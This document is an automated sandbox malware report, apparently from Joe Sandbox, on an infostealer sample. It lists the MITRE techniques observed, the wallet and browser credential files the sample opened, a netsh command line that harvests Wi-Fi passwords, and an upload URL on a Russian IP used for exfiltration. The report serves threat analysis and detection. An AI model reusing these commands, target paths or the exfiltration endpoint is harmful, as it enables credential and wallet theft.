Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4716

Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Queries volume information: C:\Users\user\Desktop\7fE6IkvYWf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles

Source: Amcache.hve.16.dr, Amcache.hve.LOG1.16.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.16.dr, Amcache.hve.LOG1.16.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
Source: 7fE6IkvYWf.exe, 00000000.00000002.4890691884.000000000A7A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 7fE6IkvYWf.exe, 00000000.00000002.4890691884.000000000A6F1000.00000004.00000020.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4890691884.000000000A7BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.16.dr, Amcache.hve.LOG1.16.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: qTC:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbt-
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3 Wallet
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
Source: 7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-
Source: 7fE6IkvYWf.exe, 00000000.00000002.4894349671.000000006FFAB000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: get_MachineKeyStore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match

File source: Process Memory Space: 7fE6IkvYWf.exe PID: 4716, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	841 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	111 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	2 Obfuscated Files or Information	LSASS Memory	145 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	941 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	63 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	3 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	63 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
7fE6IkvYWf.exe	45%	ReversingLabs	Win32.Trojan.Ursu
7fE6IkvYWf.exe	100%	Avira	HEUR/AGEN.1309950
7fE6IkvYWf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://89.23.100.233:1490/uploadt	0%	Avira URL Cloud	safe
http://upx.sf.net	0%	Avira URL Cloud	safe
http://89.23.100.233:1490	0%	Avira URL Cloud	safe
http://beta.visualstudio.net/net/sdk/feedback.asp	0%	Avira URL Cloud	safe
http://89.23.100.233:1490/upload	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
icanhazip.com	104.16.184.241	true	false		high
140.244.14.0.in-addr.arpa	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://icanhazip.com/	false		high
http://89.23.100.233:1490/upload	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://beta.visualstudio.net/net/sdk/feedback.asp	7fE6IkvYWf.exe, 00000000.00000002.4894349671.00000000703B1000.00000020.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tmpE3B.tmp.dat.0.dr	false		high
https://www.google.com	7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4891710901.000000000A83C000.00000004.00000020.00020000.00000000.sdmp, tmpE3C.tmp.dat.0.dr, tmpE3A.tmp.dat.0.dr, tmpE3B.tmp.dat.0.dr	false		high
https://duckduckgo.com/chrome_newtab	7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D4E000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4891710901.000000000A83C000.00000004.00000020.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, tmpE17.tmp.dat.0.dr, tmpE18.tmp.dat.0.dr, tmpE3C.tmp.dat.0.dr, tmpE3A.tmp.dat.0.dr, tmpE16.tmp.dat.0.dr, tmpE3B.tmp.dat.0.dr	false		high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D4E000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4891710901.000000000A83C000.00000004.00000020.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, tmpE17.tmp.dat.0.dr, tmpE18.tmp.dat.0.dr, tmpE3C.tmp.dat.0.dr, tmpE3A.tmp.dat.0.dr, tmpE16.tmp.dat.0.dr, tmpE3B.tmp.dat.0.dr	false		high
https://duckduckgo.com/ac/?q=	tmpE3B.tmp.dat.0.dr	false		high
http://89.23.100.233:1490	7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D4E000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, tmpE17.tmp.dat.0.dr, tmpE18.tmp.dat.0.dr, tmpE16.tmp.dat.0.dr	false		high
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D4E000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4891710901.000000000A83C000.00000004.00000020.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, tmpE17.tmp.dat.0.dr, tmpE18.tmp.dat.0.dr, tmpE3C.tmp.dat.0.dr, tmpE3A.tmp.dat.0.dr, tmpE16.tmp.dat.0.dr, tmpE3B.tmp.dat.0.dr	false		high
http://89.23.100.233:1490/uploadt	7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpE3B.tmp.dat.0.dr	false		high
http://upx.sf.net	Amcache.hve.16.dr	false	Avira URL Cloud: safe	unknown
http://icanhazip.com	7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4882162259.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, 7fE6IkvYWf.exe, 00000000.00000002.4891710901.000000000A83C000.00000004.00000020.00020000.00000000.sdmp, tmpE3C.tmp.dat.0.dr, tmpE3A.tmp.dat.0.dr, tmpE3B.tmp.dat.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	7fE6IkvYWf.exe, 00000000.00000002.4879202033.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpE3B.tmp.dat.0.dr	false		high
https://gemini.google.com/app?q=	tmpE3B.tmp.dat.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
89.23.100.233	unknown	Russian Federation		48687	MAXITEL-ASRU	true
104.16.184.241	icanhazip.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569817
Start date and time:	2024-12-06 10:31:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	7fE6IkvYWf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@25/20@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 202 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): WerFault.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: 7fE6IkvYWf.exe

Simulations

Behavior and APIs

Time	Type	Description
04:33:30	API Interceptor	68x Sleep call for process: 7fE6IkvYWf.exe modified
04:33:41	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
89.23.100.233	T05Dk6G8fg.exe	Get hash	malicious	Unknown	Browse	89.23.100.233:1488/upload
	3K5MXGVOJE.exe	Get hash	malicious	Unknown	Browse	89.23.100.233:1489/upload
	VaXmr82RIb.exe	Get hash	malicious	Unknown	Browse	89.23.100.233:1488/upload
104.16.184.241	T05Dk6G8fg.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	VaXmr82RIb.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	gKWbina3a4.bat	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	uyz4YPUyc9.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	5E3zWXveDN.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	LKxcbzlwkz.exe	Get hash	malicious	AveMaria, KeyLogger, Stealerium	Browse	icanhazip.com/
	9fGsCDYKLV.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/
	file.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
icanhazip.com	iGxCM2I5u9.exe	Get hash	malicious	Flesh Stealer	Browse	104.16.185.241
	T05Dk6G8fg.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	3K5MXGVOJE.exe	Get hash	malicious	Unknown	Browse	104.16.185.241
	VaXmr82RIb.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	104.16.184.241
	gKWbina3a4.bat	Get hash	malicious	Stealerium	Browse	104.16.184.241
	K6aOw2Jmji.exe	Get hash	malicious	Stealerium	Browse	104.16.185.241
	uyz4YPUyc9.exe	Get hash	malicious	Stealerium	Browse	104.16.184.241
	yv7QsAR49V.exe	Get hash	malicious	Stealerium	Browse	104.16.184.241
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse	104.16.185.241

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	datXObAAn1.exe	Get hash	malicious	Discord Rat	Browse	162.159.133.234
	EeXJoO1J62.exe	Get hash	malicious	Discord Rat	Browse	162.159.130.234
	gcrY4QgzW9.exe	Get hash	malicious	Discord Rat	Browse	162.159.136.234
	DEeQxdFfyL.exe	Get hash	malicious	Unknown	Browse	104.21.11.231
	datXObAAn1.exe	Get hash	malicious	Discord Rat	Browse	162.159.135.234
	XZaysgiUfm.exe	Get hash	malicious	Discord Rat	Browse	162.159.130.234
	EeXJoO1J62.exe	Get hash	malicious	Discord Rat	Browse	162.159.136.234
	gcrY4QgzW9.exe	Get hash	malicious	Discord Rat	Browse	162.159.135.234
	XZaysgiUfm.exe	Get hash	malicious	Discord Rat	Browse	162.159.133.234
	pn866G3CCj.lnk	Get hash	malicious	Unknown	Browse	104.21.21.242
MAXITEL-ASRU	iGxCM2I5u9.exe	Get hash	malicious	Flesh Stealer	Browse	89.23.100.233
	T05Dk6G8fg.exe	Get hash	malicious	Unknown	Browse	89.23.100.233
	3K5MXGVOJE.exe	Get hash	malicious	Unknown	Browse	89.23.100.233
	VaXmr82RIb.exe	Get hash	malicious	Unknown	Browse	89.23.100.233
	Installer_setup32_64x.exe	Get hash	malicious	LummaC, Stealc	Browse	89.23.96.109
	9fGsCDYKLV.exe	Get hash	malicious	Flesh Stealer	Browse	89.23.100.233
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	89.23.100.233
	file.exe	Get hash	malicious	Flesh Stealer	Browse	89.23.100.233
	L814CyOxMT.exe	Get hash	malicious	Flesh Stealer, PureLog Stealer, zgRAT	Browse	89.23.100.233
	vbe11TPn2x.exe	Get hash	malicious	Flesh Stealer	Browse	89.23.100.233

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_7fE6IkvYWf.exe_5c3cf58afc30521a682b8033a8cc6ff47162652_9065eb77_9893a879-c385-4671-a268-8e898a336684\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.441346426309324
Encrypted:	false
SSDEEP:	192:4l+UFiRlSrtmWbk9auo75E6UVWfaD2BfdDu76vfAIO8f:HUFiRccWbk9al5Ewa6lDu76vfAIO8f
MD5:	D8E3201FE49774884BE0570E1446AC1C
SHA1:	71BBCB6309CAFF2913AD9599D37375E6FC2CFAED
SHA-256:	F6F9ECE6C4AD7C2E24CCDD41AEA75EB3140F7D26220C5A7F70ABC15D7097BE03
SHA-512:	7CC9335E1107015F08E8D580D36EDAFCF923AF8094E048C0E80D2D0E72D7F1DBF23440A9277C2DAEB6C956C874806CA183AA2F813D1DE4B7F2C45A79626CA0F5
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.9.5.1.2.1.8.9.4.7.4.6.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.9.5.1.2.1.9.5.2.5.4.5.5.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.8.9.3.a.8.7.9.-.c.3.8.5.-.4.6.7.1.-.a.2.6.8.-.8.e.8.9.8.a.3.3.6.6.8.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.2.a.c.f.d.4.-.9.7.c.a.-.4.5.f.d.-.b.5.a.8.-.1.0.f.9.a.2.4.4.2.d.c.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.7.f.E.6.I.k.v.Y.W.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.e.a.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.6.c.-.0.0.0.1.-.0.0.5.0.-.c.d.4.4.-.4.3.e.4.c.1.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.9.e.4.0.2.a.8.f.5.c.6.8.0.c.d.8.4.3.1.0.e.a.9.f.b.a.2.e.c.7.0.0.0.0.0.0.0.0.!.0.0.0.0.5.4.8.9.5.4.a.0.2.8.4.e.d.9.d.d.8.8.7.f.b.1.d.3.9.6.7.1.2.8.9.9.7.0.a.a.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FC4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Fri Dec 6 09:33:39 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	259166
Entropy (8bit):	4.363334607290806
Encrypted:	false
SSDEEP:	3072:9VuqOXZLy5sQZSHs/xHKPz4uEqgioLTgxtvv:iXdyCtHG6z4/TgL
MD5:	43EA4081B20A5D288A2E8865FD9E4C11
SHA1:	6392ABE4F27CA54288EEAE7DDB4864A2BBD031CA
SHA-256:	1F971A5C25AB30E3AA6218C74914B65D551FF43DEEDFCD7A47FA69121F41DF28
SHA-512:	DB03B1D82B638727124F2664F2C58BDC20D8BD4D7934EA8F6E1F1E3C47C3255B3EF97AC7F58DE4BA94227C659F7DFA60D36DCD276CCD475AA25B0E5E963131B2
Malicious:	false
Preview:	MDMP..a..... .........Rg............4............+..H.......<...,3......4%..*F..........`.......8...........T............v...}..........h3..........T5..............................................................................bJ.......5......GenuineIntel...........T.......l.....Rg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER312C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8360
Entropy (8bit):	3.6816797763557996
Encrypted:	false
SSDEEP:	192:R9l7lZNiLW6si6YEvSUCRgmfZBPppDB89bYnsfB6om:R9lnNi66B6YcSUCRgmfvqYsfu
MD5:	B9073929B117EE116A878ACEDBB0E37A
SHA1:	61AF3434A81F1ABF2AEEB0F071311B9347E1E470
SHA-256:	C3713E1527B55EA0DC6A2F7FD5E941587A7BE881F23E1DC178023858ACC399ED
SHA-512:	8F65A3C24EA3B8F5E689CF559EFE35D69E3C1A04B4A0329E6A79631D5E60728C5967E55B0AFEE6788F2427E43910D6CB2D98015C390C00BD36E1F94A63A0B232
Malicious:	false
